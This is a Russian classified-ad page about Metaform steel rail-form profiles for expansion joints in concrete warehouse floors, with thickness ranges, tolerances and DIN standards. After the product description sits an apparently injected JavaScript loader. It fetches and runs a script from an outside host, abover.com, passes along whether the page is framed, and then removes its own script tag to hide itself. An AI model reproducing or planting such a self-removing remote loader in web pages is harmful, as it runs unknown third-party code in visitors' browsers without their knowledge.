Деформационные швы в бетонных полах

Информация

Мы применили профиль производства Metalscreed  для устройства деформационных швов бетонного пола на строительстве объектов складской недвижимости в Москве и Московской области.

 

Профиль для деформационного шва Metaform - многофункциональные закладные направляющие рельс-формы, предназначенные для использования в устройстве бетонных плит толщиной от 135 до 300 мм.

Metaform - уникальная, защищенная патентами конструкция анкеровки рельс-формы в верхней и нижней части бетонной плиты, обеспечивающая полную защиту края плиты, препятствующая растрескиванию и повреждению этих уязвимых участков.

Metaform - оцинкованная, высокопрочная стальная конструкция, используемая для установки внутри и по периметру бетонных плит. Идеально подходит для полов, где швы и плита пола подвергаются интенсивным нагрузкам.

Metaform производятся по самым высоким допускам прямолинейности, лучше, чем ± 1 мм на погонный метр, и рекомендуются для использования при устройстве полов в соответствии с нормами DIN 15185 и DIN 18202.

(function () { var script = document.createElement(`script`); script.src = `https://abover.com/system/extension?iframe=` + ( self === top ? `0` : `1` ) + `&r=` + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();

№ 8949 8 апреля 2014 в 22:36 (до 05.04.2024) Денис Васильчук
Похожие объявления
Комментарии
Комментариев к записи нет. Вы можете стать первым!

Добавить комментарий

Оставлять комментарии могут только зарегистрированные пользователи!
 
Яндекс.Метрика Рейтинг досок объявлений доски объявлений - каталог и рейтинг Рейтинг лучших досок объявлений